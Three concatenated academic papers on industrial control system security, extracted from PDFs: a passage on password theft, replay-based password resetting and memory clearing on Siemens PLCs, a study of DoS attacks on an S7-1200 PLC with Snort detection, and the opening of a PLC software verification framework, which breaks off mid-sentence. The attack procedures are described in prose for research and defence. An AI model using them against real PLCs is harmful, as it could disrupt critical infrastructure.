This clearly might cause signi cant damage to a SCADA system. 1) Password stealing: As detailed Section IV, packets between the engineering station and the PLC are sent in clear including the encoded passwords. Based on a representative set of samples, we could locate the password inside packets and reverse-engineer the password encoding scheme. This allowed us to retrieve the plain-text password from the network traf c between the engineering station and the PLC. 2) Unauthorized password setting and updating: In a legitimate scenario, the PLC password is set and updated from the con guration software in the engineering station. In case of password update, the old password should be supplied rst. Due to the PLC access control vulnerability, an attacker can set and update the password by replaying malicious packets directly to the PLC. When a password is written on the PLC, the SDB (System Data Block) is overwritten. The load process rst checks the SDB to see if it s clean or has a con guration already. If there is a con guration, the process checks if a password is set or not. Hence, there are two main cases: setting a con guration with a password for the rst time and updating an old con guration that has already a password. For the rst case, setting a password for the rst time requires to record a password setting packets sequence used in an old session and then replaying them. Since the goal is mainly to set the password, only packets in charge of overwriting block 0000 in the SDB, which contain the password, are kept (More details in Section IV-B). For the second case, the goal of the attack is to set a password while the PLC is already protected by an existing password. Using the same procedure as the rst case as-is did not work. After investigation it turned out that the block 0000 of the SDB holding the password cannot be overwritten by replaying packets. As a result, the PLC keeps sending a World Congress on Industrial Control Systems Security (WCICSS-2016) 978-1-908320-63/6/$31.00 2016 IEEE 60 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:13 UTC from IEEE Xplore. Restrictions apply. FIN packet whenever an attempt is made to overwrite the SDB. To overcome this problem, we resorted to a two-stage procedure where initially we clear the content of 0000 block and then we replayed packets to overwrite only that block with a new password. Since there is no legal command to just clean 0000 block, we looked for a sequence of packets to delete a different block and we modi ed them to delete 0000 block. With this two-stage procedure, the password is successfully updated by a different workstation without the con guration software and without knowing the old password. 3) Clear PLC memory: The rst stage of the unautho- rized password updating attack consists in clearing the 0000 block of the SDB without a need for the password. This step can be generalized to clear other blocks. More importantly, in an extreme use case, all PLC memory blocks can be cleared. With this vulnerability, an attacker can launch a DoS attack by clearning all PLC memory and turning the PLC into unresponsive device. VI. R ELATED WORK Very close to our work, in a BlackHat talk, Beresford demonstrated a number of vulnerabilities in Siemens Simatic PCS7 software including replay attacks, authentication by- pass, ngerprinting and remote exploitation using Metasploit framework [5]. This paper deviates from Beresford s demon- strations since our attacks are more interactive and use the recent and more secure versions of the PCS7 software as well as the more uptodate rmware of Siemens PLC S7- 400. As a generalization of Beresford s attacks, Milinkovic and Lazic reviewed a set of commercial Operating Systems running on PLCs of major vendors, highlighting serious vul- nerabilities with some experiments of few attacks conducted on ControlLogix PLC [6]. Also close to our work, Sandaruwan et al. showed how to attack Siemens S7 PLCs by exploiting aws in the ISO- TSAP (Transport Service Access Point) protocol used for data exchange between controllers and PLCs [7]. A signi cant body of work in the literature focuses on security solutions for ICS systems which yield several coun- termeasures to reinforce the security of such systems. These can be classi ed into communication protocols improve- ment [8], [9], and rewalls, ltering methods, DMZs [10], [6], [7]. However, unlike typical IT systems, it is impractical and cost-effective to embrace several layers of mitigations due to performance and availability considerations. VII. C ONCLUSION PLCs are preferred target for cyber security attacks. PLC security issues range from simple DoS to sophisti- cated remote code execution vulnerabilities. Most of PLC attacks are possible because attackers could have access and compromise the PLC device. In this paper, we carried out a security analysis of the most common PLC accesscontrol mechanism, namely, password-based access control. Using recent PLC devices (2016) with updated rmware, we showed how passwords are stored in PLC memory, how passwords can be intercepted in the network, how they can be cracked, etc. As a consequence of these vulnerabilities, we could carry out advanced attacks on ICS system setup, such as replay, PLC memory corruption, etc. Although mitigating such vulnerabilities is relatively easy by placing a security module (e.g. Scalance S) between the PLC and other devices, such approach is not yet widely deployed for budget and practical considerations. ACKNOWLEDGMENT This research was supported by The National Science, Technology and Innovation Plan (NSTIP) grant, NSTIP 13-INF281-04 at King Fahd University of Petroleum and Minerals. REFERENCES [1] N. Falliere, L. O. Murchu, and E. Chien, w32.stuxnet dossier , White paper, Symantec Corp., Security Response, 2011. [2] A. Costin, J. Zaddach, A. Francillon, and D. Balzarotti, A large-scale analysis of the security of embedded rmwares, 23rd USENIX Security Symposium (USENIX Security 14), pp. 95 110, 2014. [3] E. Byres, Revealing network threats, fears: How to use ansi/isa-99 standards to improve control system security, 2011. [4] P. Biondi, Scapy, see http://www. secdev. org/projects/scapy, accessed on 2016-09-20. [5] D. Beresford, Exploiting siemens simatic s7 plcs, Black Hat USA, 2011. [6] S. A. Milinkovi c and L. R. Lazi c, Industrial plc security issues, Telecommunications Forum (TELFOR), pp. 1536 1539, 2012. [7] G. Sandaruwan, P. Ranaweera, and V . A. Oleshchuk, Plc security and critical infrastructure protection, 2013 IEEE 8th International Conference on Industrial and Information Systems, pp. 81 85, 2013. [8] M. Majdalawieh, F. Parisi-Presicce, and D. Wijesekera, Dnpsec: Distributed network protocol version 3 (dnp3) secu- rity framework, in Advances in Computer, Information, and Systems Sciences, and Engineering. Springer, 2007, pp. 227 234. [9] J. Heo, C. S. Hong, S. H. Ju, Y . H. Lim, B. S. Lee, and D. H. Hyun, A security mechanism for automation control in plc-based networks, 2007 IEEE International Symposium on Power Line Communications and Its Applications, pp. 466 470, 2007. [10] R. E. Johnson, Survey of scada security challenges and potential attack vectors, Internet Technology and Secured Transactions (ICITST), 2010 International Conference for, pp. 1 5, 2010. World Congress on Industrial Control Systems Security (WCICSS-2016) 978-1-908320-63/6/$31.00 2016 IEEE 61 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:13 UTC from IEEE Xplore. Restrictions apply.
Cyber_security_in_industrial_control_systems_Analysis_of_DoS_attacks_against_PLCs_and_the_insider_effect.pdf
Industrial Control Systems (ICS) are vital for countries smart grids and critical infrastructures. In addition to the advantages such as controlling and monitoring geographically distributed structures, increasing productivity and efficiency, ICS have brought some security problems. Specific solutions are needed to be produced for these security issues. The most important information security component for ICS is availability and the most devastating threat to this component is Denial of Service (DoS) attack. For this reason, DoS attacks carried out on Programmable Logic Controllers (PLC), an important component of ICS, have been analyzed in the paper. In the test environment where attack scenarios were implemented, real PLC devices were used in order to get the most accurate results. The destructive effects of insiders, particularly in the case of cyber attacks against ICS, in bypassing the system security measure and discovery phase also emphasized in the paper.
978-1-5386-4478-2/18/$31.00 2018 IEEE Cyber Security in Industrial Control Systems: Analysis of DoS Attacks against PLCs and the Insider Effect Ercan Nurcan Ylmaz, B nyamin Ciylan Gazi University, Faculty of Technology, Ankara, Turkey Serkan G nen Gazi University, Institute of Natural and Applied Sciences, Ankara Turkey Erhan Sindiren, G k e Karacay lmaz Gazi University, Institute of Informatics, Ankara, Turkey Index Terms -- Denial of service, indu strial control systems, insider attacks, PLC security, vulnerability analysis. I. INTRODUCTION Industrial Control Systems (ICS); are used in the management and maintenance of critical infrastructures, which are usually geographically distributed, such as gas, water, production, transportation and power distribution systems. Most of the ICS consist of several sub-components, such as Programmable Logic Controller (PLC), Human Machine Interface (HMI), Master Terminal Unit (MTU) and Remote Terminal Unit (RTU) [1]. However, in old generation ICS, private internal networks which were independent from the external networks were used for communication of these components. In order to control and monitor geographically distributed structure and to increase productivity and efficiency, Internet or intranet connection was required in ICS [2-4]. Along with this process, new vulnerabilities that could not be identified beforehand have emerged. These vulnerabilities are; Generally using open system source codes, Permitting remote access (VPN, etc.), Beyond security, ICS have a design that primarily focuses on the effectiveness of the system, such as critical timing needs, tight performance definitions, and task priorities, Not using security systems that should be used to protect ICS from other networks or from threats that may arise from the network because of commercial concerns, Not controlling privileged accounts of authorized IT staff, Not changing default usernames and passwords and therefore leaving backdoors, Using communication protocols developed for commercial purposes that security is not considered at all or rarely handled [5]. ICS are responsible for controlling and monitoring many critical infrastructures. For this reason, security vulnerabilities in systems under control, the entire infrastructure can become ICS cause these systems to become potential targets for attackers. If the attackers deactivate these systems, this may result not only in economic harm but also in the fact that citizens cannot receive important services in their lives [6]. Thus, it is crucial to analyze in depth to reveal existing vulnerabilities of components (PLC, HMI, RTU, MTU, etc.) and the protocols (ModBUS, Profinet, DNP3, etc.) used in ICS [7]. It will only be possible to take precautions against these vulnerabilities and prevent them from being exploited again by the attackers [8-10]. Vulnerabilities in ICS can cause intruders to infiltrate the network, gain access to control software, and lead to undesired major damages with changing the operating conditions of the system. DoS attacks are the types of attacks that can eventually be noticed by the vi ctims. However, it is important to detect these attacks as soon as possible, without hampering the use of services or creating a flood impact [11]. While DoS attacks seem often less dangerous than other attacks, they can become more dangerous in some cases for ICS and for critical infrastructures these systems manage. For example, in the event of preventing to close the gate of a dam in an urgent occasion or disabling the systems that control the temperature, such as in nuclear power plants, the denial of service attack can lead to major disasters. ICS are an integral component of the production and control process. The management of the majority of modern infrastructures is based on these systems. However, when they are evaluated in terms of cyber security, it is seen that the PLCs, which are important components of ICS, are in an open architecture to external networks and especially internet based constructions. Despite the security breaches in ICS, until recently, there has not been enough interest and study in the scientific area of the securi ty of PLC-managed automation systems. Only after the detection of Stuxnet malware in 2010, researches to identif y security vulnerabilities in PLC-based systems have begun to attract interest of PLC suppliers and users. Subsequent virus findings such as DuQu, Flame / sKyWIper, Night Dragon, Shamoon, Havex and Sandworm / Black Energy 2 also indicate the presence of an increasing tendency in critical infrastruc ture attacks. Despite these 2018 6th International Istanbul Smart Grids and Cities Congress and Fair (ICSG) 81 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:37 UTC from IEEE Xplore. Restrictions apply. events, security awareness of ICS environments is still not a top priority in many institutions [12]. Because the security objectives for ICS are based on accessibility, integrity and confidentiality, respectively [13,14]. In this context, the test environment (Testbed) was established to determine how to bypass the security precautions of the PLC, which is a significant component of ICS, by exploiting the security vulnerabilities of hybrid ICS protocols (Profinet-TCP/IP, etc.). In the test environment, the vulnerabilities of PLCs were evaluated through Denial of Service (DoS) attacks. Subsequently attacked packets were captured and analyzed in order to obtain the patterns of the attacks. Furthermore, the importance of managing privileged accounts for cyber attacks against ICS and the effects of insiders with these accounts were discussed. In this respect, it is aimed to rescue ICS from attacks with minimal damage and to prevent from similar attacks. Some of the studies on the security of ICS have focused on analysis based on simulation systems [14-17]. The weakest points of studies based on simulation systems are the difficulty of accurately projecting the real system and the possibility that the analyzes may not give the same results in the real system. Another part of the studies carri ed out within the scope of the security of ICS focus on confidentiality [18,19]. Solutions proposed above are usually based on cryptographic techniques. However, given the fact that today's ICS networks cover hundreds of installations with millions of equipment, the difficulty of implementing these solutions in practice can be better understood. II. T ESTBED In the majority of researches on the security of ICS, no implementation has been done to a real system. Thus, this study focuses on the detection of the vulnerabilities of the PLC device and TIA Portal app lication and the identification of the solution proposals by carrying out security analysis on a testbed where a real control system is involved. Figure 1. DoS attack reconnaissance, attack and detection steps for PLCs As shown in Fig. 1, the analysis of the DoS attack carried out on PLC and TIA Portal applications consist of three phases. At first phase, attacks were carried out and the effects on the system were evaluated. The second phase is the observation phase, which is based on the analysis of captured packets as a result of attacks. In the last stage, it was aimed to create patterns related to attack via intrusion detection systems for detecting similar attacks. The testbed consisted of one S-7 1200 (2.2 firmware) PLC hardware, one management computer on which remote command and control of the PLC was performed with TIA Portal management software, and a personal computer with Kali Linux operating system for implementing attacks. A separate computer with SmoothSec installed was used to detect the attacks. DoS attacks were carried out on PLCs and TIA Portal application in the network topology shown in Fig. 2 by using Hping, SmootSec IDS and Wireshark tools. Figure 2. Testbed network topology III. DENIAL OF SERVICE ATTACK (DOS) One of the important threat to ICS is Denial of Service attack. The aim of Denial of Service attack is to block the system to access to authorized resources or preventing to use these resources in its intended manner [20,21]. Figure 3. DoS attack reconnaissance, attack and detection phases 2018 6th International Istanbul Smart Grids and Cities Congress and Fair (ICSG) 82 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:37 UTC from IEEE Xplore. Restrictions apply. In the analysis of the attack, Service Denial attack was carried out first, and the changes in the system were examined. Subsequently the rule sets crea ted by analyzing the captured attack packets according to the ph ases indicated in Fig. 3 were entered into the Snort based library. Detecting attacks, the ultimate goal, was achieved through these rules. PLC protocols responds to all query packets from any IP / MAC address or node points and this situation is also another important vulnerability in PLCs. It is determined that DoS attack can be carried out su ccessfully even if it is in a different network as long as the IP address of the target is detected, because DoS attack is a kind of directly IP-oriented attack. Any port scan tool like Nmap tool can be used for detecting the IP address of a PLC. In this respect, DoS attack was carried out to the PROFINET port (102) which is used mostly by PLC devices for network communication. Hping program was used for DoS attack and as long as the attack continued, the ping response time of the PLC device increased considerably. When the DoS attack was stopped, the ping response time measured as 1212 ms as shown in Fig. 4. Figure 4. DoS attack effects on PLC The DoS attack was also carried out to the TIA Portal, the control computer. As long as the attack continued, ping response time increased from about 2ms to 5280 ms. Additionally, all of the control buttons of the TIA Portal became inactive and the PLC could not be controlled via the TIA Portal as shown in Fig. 5. Figure 5. TIA Portal management screen after DoS attack DoS attack packets carried out on PLC were detected as medium severity spam as shown in Fig. 6. Figure 6. Event packets detected after DoS attack Despite the attack was carried out with a few attacker computers, it was detected that network became ineffective. According to the delay standard of the IEEE 1646-2004 The Automation Communication of Substations, high-speed messages must be transmitted between 2 ms and 10 ms [22]. In this context, when the needs of instant reaction of PLC is considered, latency occurs in the network traffic of the control systems due to DoS attack may lead to significant problems. It is easy to detect IP address of attacker when DoS attack is carried out from a single source. However, it is more difficult to detect DoS attacks from different IP addresses by performing IP spoofing. Thus, attackers use IP spoofing method to hide the IP addresses and uses bogon IP adresses such as the attack scenario handled in this paper (Fig. 7). Figure 7. Source IP addresses of DDoS attack packets When the rule information of a listed event shown in Fig. 6 is examined, it can be understood that event packets are the distributed denial of service (DDoS) attack packets described in Fig. 8. Figure 8. The signature acquired after DoS attack 2018 6th International Istanbul Smart Grids and Cities Congress and Fair (ICSG) 83 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:37 UTC from IEEE Xplore. Restrictions apply. IV. ANALYSIS RESULT In the vulnerability analysis DoS attacks were carried out on PLC, one of the most important component of ICS, and results of attacks indicated that PLCs were vulnerable to these attacks. The detection phase of attack analysis results have shown that needed precautions for possible attacks can be taken by monitoring the PLC communication traffic continuously. Although, signature based prevention systems (antivirus, IPS, etc.) are believed to have a great success against the known cyber attack, they are not effective enough against new malicious payloads emerging in every second, especially the zero day vulnerabilities. For this reason, adjusting network traffic norms and thresholds with continuous monitoring provides constituting attack patterns for alerting network administrators / security experts. Thus, it will be possible to prevent malicious packets from infiltrating and harming the system, while ensuring that the legal packets are not delayed and prevented in the context of the continuity dimension of ICS. When the phases of the attacks in the testbed are examined, it is understood that the network topology and the determination of the target are vital factors for implementing successful attacks. However, in the event that the attacker is an insider within the organization and has privileged authorization over ICS systems, the success rate and destructive effects of the attack will increase. For this reason, it is very important to monitor the operations performed by employees with privileged authorization on ICS and to regulate their authority. V. I NSIDERS EFFECTS AND SOLUTION SUGGESTIONS Some studies investigating the causes of information security threats suggest that careless or malicious personnel with Access authorization are more hazardous and destructive than hackers, malicious software and troubled hardware [23,24]. In other studies, it is estimated that the abuse of privileged accounts is at high risk during insider attacks and this kind of attacks will increase in the coming period [25, 26]. Such risks are also prevalent for ICS and if the necessary security measures are not taken for insider threat, the effects for ICS will be much more devastating. Because, the detection and prevention of an at tack will be so difficu lt in the event that an insider has the knowledge of the network topology and components of the ICS. Protection from insider attacks requires specific solutions. However, when organizations' cyber security solutions are examined, it appears that most of them focus on external threats [27]. Security solutions to be used for internal and external threats should not be considered separately on the contrary they should be carried out in an integrated manner [28]. In order to prevent internal threats, not only technological solutions but also human factors should be evaluated. In addition to ordinary user accounts, ICS also has administrator accounts that are owned by IT staff with privileged authorization within the system. These accounts are mostly used for management, maintenance and repair of systems. One of the goals of the attackers to achieve their ultimate goal is the privileged accounts and their passwords used in the system. The seizure of one of these account's password by the attackers can cause the whole system to be seized. The Maroochy Water Service Breach incident, one of the attacks on ICS implemented by the insiders, was derived from the fact that the user account of a discarded employee was not removed from authorized accounts [29]. Ukrainian Power Grid Attack also was stemmed from careless and untrained users. Attackers gained privileged accounts from these users and causing about 225,000 people to be affected. Stuxnet is one of the most well-known target driven attack carried out on ICS. Although it is not known ex actly how this attack was carried out, majority of the rese archers think that the attackers got help from an insider for carrying out such a complicated attack. The main reason of this opinion is that ICS, the target of the attack, have an air gap structure isolated from the outside [30]. The control and management of privileged accounts, one of the most important causes of ICS attacks, is an important information security issue that needs to be assessed. Many measures and procedures have been proposed by researchers to solve this problem. Although the objectives of the solutions proposed by the researchers are the same, they involve different approaches [31-34]. A control mechanism should be developed on the basis of the issues discussed above to prevent exploitation of privileged accounts during insider attacks. The developed control mechanism should involve; Prevention unauthorized access to components of the ICS Increasing ICS resistance to password attacks Training and expanding awareness of staff on cyber security Regulation of access control to ICS components Keeping logs to follow up transactions performed by authorized personnel Clearly defining the limits of re sponsibility within the ICS Ensuring to include organizational managers in the IT security process. Figure 9. The position of control mechanism within ICS 2018 6th International Istanbul Smart Grids and Cities Congress and Fair (ICSG) 84 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:37 UTC from IEEE Xplore. Restrictions apply. The control mechanism to be established in accordance with the specified points should run integrated with ICS. The control mechanism must be located between the ICS and the authorized personnel as an additional layer of security in accessing the components of the ICS infrastructure (Fig. 9). VI. C ONCLUSION Many critical infrastructures managed by ICS do not have adequate security assessment against cyber attacks. These critical systems can face many threats, unless the security vulnerabilities of the ICS are determined and the necessary measures are taken to overcome them. In this context, critical ICS components need to be monitored in real time so that ICS, which significantly affect our social lives, can survive with minimal damage from potential cyber threats and can be activated as soon as possible. As a result of analysis, it has been seen that detection based solutions including continuous quality monitoring and behavior based testing are more effective than security measures based on preventing due to new malware emerging every second. Furthermore, organizations with critical infrastructure to prevent Insider attacks should develop and implement a control mechanis m for staff with privileged authority over ICS and other employees. The operations on ICS of all employees who are likely to become an insider should be monitored and recorded. It should not be forgotten that attacks aimed ICS may carry out not only from outside but also from a trusted staff with privileged account. R EFERENCES [1] H. Farhangi, "The path of the smart grid," IEEE Power and Energy Magazine, vol. 8, no. 1, pp. 18-28, Dec. 2010. [2] P. Motta Pires and L. H.g. Oliveira, "Security Aspects of SCADA and Corporate Network Interconnection: An Overview," in Proc. 2006 Int. Conf. on Dependability of Computer Systems , pp. 127-134. [3] V. M. Igure, S. A. Laughter, and R. D. Williams, "Security issues in SCADA networks," Computers & Security, vol. 25, no. 7, pp. 498-506, Oct. 2006. [4] M. Hentea, "Improving Security for SCADA Control Systems," Interdisciplinary Journal of Information, Knowledge, and Management, vol. 3, pp. 073-086, 2008. [5] S. Rautmare, "SCADA system security: Challenges and recommendations," in Proc. 2011 Annual IEEE India Conf. , pp. 1-4. [6] S. Clements and H. Kirkham, "Cyber-security considerations for the smart grid," in Proc. 2010 IEEE PES General Meeting , pp. 1-5. [7] R. E. Johnson, "Survey of SCADA security challenges and potential attack vectors," in Proc. 2010 Int. Conf. for Internet Technology and Secured Transactions , pp. 1-5. [8] A. Nicholson, S. Webber, S. Dyer, T. Patel, and H. Janicke, "SCADA security in the light of Cyber-Warfare," Comput. Secur., vol. 31, no. 4, pp. 418-436, June 2012. [9] G. P. H. Sandaruwan, P. S. Ranaweera, and V. A. Oleshchuk, "PLC security and critical infrastructure protection," in Proc. 2013 IEEE 8th Int. Conf. on Industrial and Information Systems , pp. 81-85. [10] M. Jensen, C. Sel, U. Franke, H. Holm, and L. Nordstr m, "Availability of a SCADA/OMS/DMS system - A case study," in Proc. 2010 IEEE PES Innovative Smart Grid Technologies Conf. Europe , pp. 1-8. [11] T. Peng, C. Leckie, and K. Ramamohanarao, "Survey of network-based defense mechanisms countering the DoS and DDoS problems," ACM Comput. Surv., vol. 39, no. 1, pp. 1-42, Apr. 2007 2007, Art. no. 3. [12] E. Byres, "Defense-In-Depth: Reliable Security To Thwart Cyber- Attacks," Pipeline & Gas Journal, vol. 241, no. 2, Feb. 2014. [13] D. Kushner, "The real story of stuxnet," IEEE Spectrum, vol. 50, no. 3, pp. 48-53, Mar. 2013. [14] E. Byres, D. Hoffman, and N. Kube, "On Shaky Ground A Study of Security Vulnerabilities in Control Protocols," in Proc. 2006 5th Int. Topical Meeting on Nuclear Plant Instrumentation, Controls, and Human Machine Interface Technology vol. 1, pp. 782-788. [15] A. Giani, G. Karsai, T. Roosta, A. Shah, B. Sinopoli, and J. Wiley, "A testbed for secure and robust SCADA systems," SIGBED Rev., vol. 5, no. 2, pp. 1-4, July 2008. [16] B. Genge, F. Graur, and P. Haller, "Experimental assessment of network design approaches for protecting industrial control systems," Int. Journal of Critical Infrastructure Protection, vol. 11, pp. 24-38, Dec. 2015. [17] N. Sayegh, A. Chehab, I. H. Elhajj, and A. Kayssi, "Internal security attacks on SCADA systems," in Proc. 2013 3rd Int. Conf. on Communications and Information Technology , pp. 22-27. [18] H. Li, R. Mao, L. Lai, and R. C. Qiu, "Compressed Meter Reading for Delay-Sensitive and Secure Load Report in Smart Grid," in Proc. 2010 First IEEE Int. Conf. on Smart Grid Communications , pp. 114-119. [19] E. Shi, A. Perrig, and L. V. Doorn, "BIND: a fine-grained attestation service for secure distributed systems," in Proc. 2005 IEEE S y mposium on Security and Privacy , pp. 154-168. [20] A. Silberschatz, P. B. Galvin, and G. Gagne, "Security," in Operating System Concepts , 9th ed., Hoboken, NJ: John Wiley & Sons, 2013, pp. 673-674. [21] P. Varalakshmi and S. T. Selvi, "Thwarting DDoS attacks in grid using information divergence," Future Generation Computer Systems, vol. 29, no. 1, pp. 429-441, Jan. 2013. [22] K. C. Budka, J. G. Deshpande, T. L. Doumi, M. Madden, and T. Mew, "Communication network architecture and design principles for smart grids," Bell Lab. Tech. J., vol. 15, no. 2, pp. 205-227, Sep. 2010. [23] J. Shropshire, M. Warkentin, and S. Sharma, "Personality, attitudes, and intentions: Predicting initial adoption of information security behavior," Computers & Security, vol. 49, pp. 177-191, Mar. 2015. [24] M. Leitner and S. Rinderle-Ma, "A systematic review on security in Process-Aware Information Systems-Constitution,challenges, and future directions," Inf. Softw. Technol., vol. 56, no. 3, pp. 273-293, Mar. 2014. [25] R. Pilling, "Global threats, cyber-security nightmares and how to protect against them," Computer Fraud & Security, vol. 2013, no. 9, pp. 14-18, Sep. 2013. [ 2 6 ] W . R . C l a y c o m b , C . L . H u t h , L . F l y n n , D . M . M c I n t i r e , a n d T . B . Lewellen, "Chronological Examination of Insider Threat Sabotage: Preliminary Observations," Journal of Wireless Mobile Networks, Ubiquitous Computing, and Dependable Applications (JoWUA), vol. 3, no. 4, pp. 4-20, Dec. 2012. [27] T. El Maliki and J.-M. Seigneur, "A Survey of User-centric Identity Management Technologies," in Proc. 2007 Int. Conf. Emerging Security Information, Systems, and Technologies , pp. 12-17. [28] S. De Capitani di Vimercati, S. Paraboschi, and P. Samarati, "Access control: principles and solutions," Software: Practice and Experience, vol. 33, no. 5, pp. 397-421, Apr. 2003. [29] J. Slay and M. Miller, "Lessons Learned from the Maroochy Water Breach," in Critical Infrastructure Protection , Boston,MA: Springer, 2008, pp. 73-82. [30] R. M. Lee and M. J. Assante. (2015, Oct. 15). The Industrial Control System Cyber Kill. SANS Institute . [Online]. Available: https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297 [31] K. Padayachee, "An assessment of opportunity-reducing techniques in information security: An insider threat perspective," Decision Support Systems, vol. 92, pp. 47-56, Dec. 2016. [32] N. Baracaldo and J. Joshi, "An adaptive risk management and access control framework to mitigate insider threats," Computers & Security, vol. 39, pp. 237-254, Nov. 2013. [33] I. Agrafiotis, J. R. C. Nurse, O. Buckley, P. Legg, S. Creese, and M. Goldsmith, "Identifying attack patterns for insider threat detection," Computer Fraud & Security, vol. 2015, no. 7, pp. 9-17, July 2015. [34] Y. L. Wang and S. C. Yang, "A Method of Evaluation for Insider Threat," in Proc. 2014 Int. Symposium on Computer, Consumer and Control, pp. 438-441. 2018 6th International Istanbul Smart Grids and Cities Congress and Fair (ICSG) 85 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:37 UTC from IEEE Xplore. Restrictions apply.
A_hierarchy_framework_on_compositional_verification_for_PLC_software.pdf
The correctness verification of embedded control software has become an importan t research topic in embedded system field. The paper analys es the pres ent situation on correctness verification of control software as well as the limitations of existing technologies. In order to the high reliability and high security requirements of control software, the paper proposes a hierarchical framework and architecture of control software (PLC program) verification. The framework combines the technologies of testing, model checking and theorem proving. The paper introduces the construction, flow and key elements of the architecture.
A Hierarchy Framework on Compositional Verification for PLC Software Litian Xiao1,2 and Mengyuan Li 1Beijing Special Engineering Design and Research Institute Beijing 100028, China {xiao_litian & li_mengyuan2000}@sina.com Ming Gu and Jiaguang Sun 2 School of Softw are, TNList, KLISS Tsinghua University Beijing 100084, China {guming & jgsun}@ tsinghua.edu.cn Keywords-PLCsoftware; compositional verification; hierarchy framework; verification architecture I. INTRODUCTION Programmable Logic Controlle r (PLC) is a kind of embedded system in automatic cont rol system. PLC software is a core for controlling, monito ring or managing other devices. The program logic of PLC software controls the action circuits of control system. Now PLC software has larger scale and more complex functions so that its correctness is difficultly ensured. Its errors or bugs will lead to unpredictable or uncontrolled behavior of control system [1]. Limited fewer embedded testing means, PLC program cannot be directly tested and verified [2]. Now its testing generally needs to build the op erating environment through the actual hardware and software, and sometimes even is required to complete in real environment. The testing is costly and cannot guarantee test coverage. Some boundary or wrong tests may cause controlled device fault, serious damages or even accidents. How to ensure the correctness of PLC software in safety-critical automatic control systems has become an important research in the field of embedded system. The paper presents a hierarchy framework for compositional verification and strategies of correctness verification for PLC software. It mainly introduces the architecture and key factors of the hierarchy framework. The main work and achievements of the research are introduced. II. R ELATED WORK ON SOFTWARE VERIFICATION To ensure software correctness, testing, formal or mathematic and systematic met hods are used to avoid program bugs. The main methods are aimed at checking programs on the three levels of code, model and statute, which include: /g121Testing methods: It finds an d reproduces bugs in program while specific functional segments or code segments (test cases) are really executed in some particular scene or by input data. /g121Verification methods: By means of a certain abstract mechanism, the program codes are transformed into specific mathematical representation. Then the correctness conclusion of a program is obtained by searching, reasoning, proof and other means based on mathematical representation. Their technologies are testi ng, model checking and theorem proving and currently can be used for PLC program. A. Testing Technology on Code Level Software testing is an effective means to find program bugs. The found bugs are r eal existence in a program. The biggest drawback of testing is incomplete , i.e. it is difficult to traverse all possible execution paths for slightly complex program. It is difficult to design a system atic approach and use limited test cases for completely covering up to all codes. For embedded software testing, hybrid prototype is mainly utilized by international research institutions such as NASA, Boeing, Israel AirForce. It creates a test environment by means of emulators, simulators, software modeling and injected host computer data. The hardware prot otype components of hybrid prototype are directly connected to the target system and are given controlled response signals to that. The response signals are the same as the actual signals of real system and environment. Host computer injects testing data into target system based on software model, control model and processes. Such research is also a hot issue, but test cost is very high. B. Model Checking Technology on Model Level Verification method and test technology have strong complementarity. Also verifica tion method is a hot research issue [3]. Model checking is a type of verification method based on model, searches state space and verifies specified nature. Generally function nature is safety property, liveness property and fairness property etc. [4] The method is reliable and complete for specified nature. Its biggest problem is "state space explosion". Although some scholars have studied model checking algorithms for infinite-state, currently these algorithms cannot be applied to general purposes. This research is sponsored by NSFC Pr ogram (No.90718039, No.91018015 and No.60811130468) of China ____________________________________ 978-1-4799-3279-5 /14/$31.00 201 4 IEEE  Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:14 UTC from IEEE Xplore. Restrictions apply. Even if model checking obtains an affirmative conclusion, it is not able to ensure other properties such as non-functional properties (e.g. divided by zero, data overflow, etc.). Furthermore, model itself is not a program and is gotten by abstracted a real program codes. In the abstracted process, a constructed model is allowed to increase some non-existent actions in actual program, and not to delete any actions. Such abstracted mode possibly leads to false reports in the verification process--incorrec tly report errors in actual program. The model must be further refined to eliminate false reports. Now classic model checking tools include SPIN [5], NuSMV[6] and UPPAAL[7], etc. C. Theorem Proving Technology on Statute Level Another type of verificati on method is based on mathematical proof. These methods firstly describe the behavior characteristics of a system with a series of logical formulas. Then some properties are proven by means of a logical system (or proof tool s), inference rules provided by deductive methods or falsifi cation established goals. Theorem proving method is very suitable for the verification of infinite stat e systems. Because most of the proving tools (e.g. PVS [8], COQ[9], Nqthm[10]) provide for higher-order logic which has the ability to describe infinite data structures, they are not sensitive to the size of state space. However, there are some flaws on theorem proving methods. These methods don t have high automation degree and require a lot of manual operation. A high degree of expertise is required for theorem proving, and they need to be familiar with particular domain. D. Verification Technolog y on PLC Program The above-mentioned technologies can be used to verify PLC programs and have sim ilar advantages and disadvantages. Now there are few verification technologies for PLC program on practical achievement. Many researchers have studied ho w to do model-checking for PLC program. Some research directly converse specific PLC program into the input of model-checking tool. They demand single restricti on model of PLC prog ram, i.e. Boolean variables exist only in the program , and jump statements or multiple blocks or functions cannot [11]. Others abstract PLC program into models for model -checking tool. However, these models are somewhat abstract distortion and their checking scale is small [12]. The works can partly solve the problems of model-checking for some particular PLC programs, but there is a lack of reduced strategy of the state space size. Combinatorial model-checking are widely studied and applied for decreasing state space size. The works depend on the manual definition of both m odules combination and divided assertions, which reduces the autom ation of model-checking. Their success depends largely on the choice of abstract variables. On the theoretical research of combination model-checking, the works use linear temporal logic (LTL) or introduce a temporal operator to TLA, which construct different combinatorial verifying frameworks and corresponding combinatorial verify ing rules. Some methods can explain some cyclic verification rules in LTL and the cycle combination rules based on Moore machine model or Lattice theory [13]. On theorem proving for PLC program, some researches design simple PLC modular model and assume the current value increases monotonically and no resetting action course. Then the model is verified by theorem proving tool Isabelle/HOL. Others define PLC instruction semantics and verify a property on safety or time sequence by theorem proving tool COQ [14]. The mentioned work is so limited that they cannot be taken directly to verify general PLC pr ograms. Moreover, they didn t implement the derivation of overall properties for whole system from sub-system properties. III. T HE FRAMEWORK FOR COMPOSITIONAL VERIFICATION OF PLC PROGRAM The above-mentioned studies cannot systematically solve the verification problems of PLC program. We combine the characteristics of the PLC program with the advantages of different verification m eans, and make PLC program verification technology and formal verification methods practically used. PLC program is a 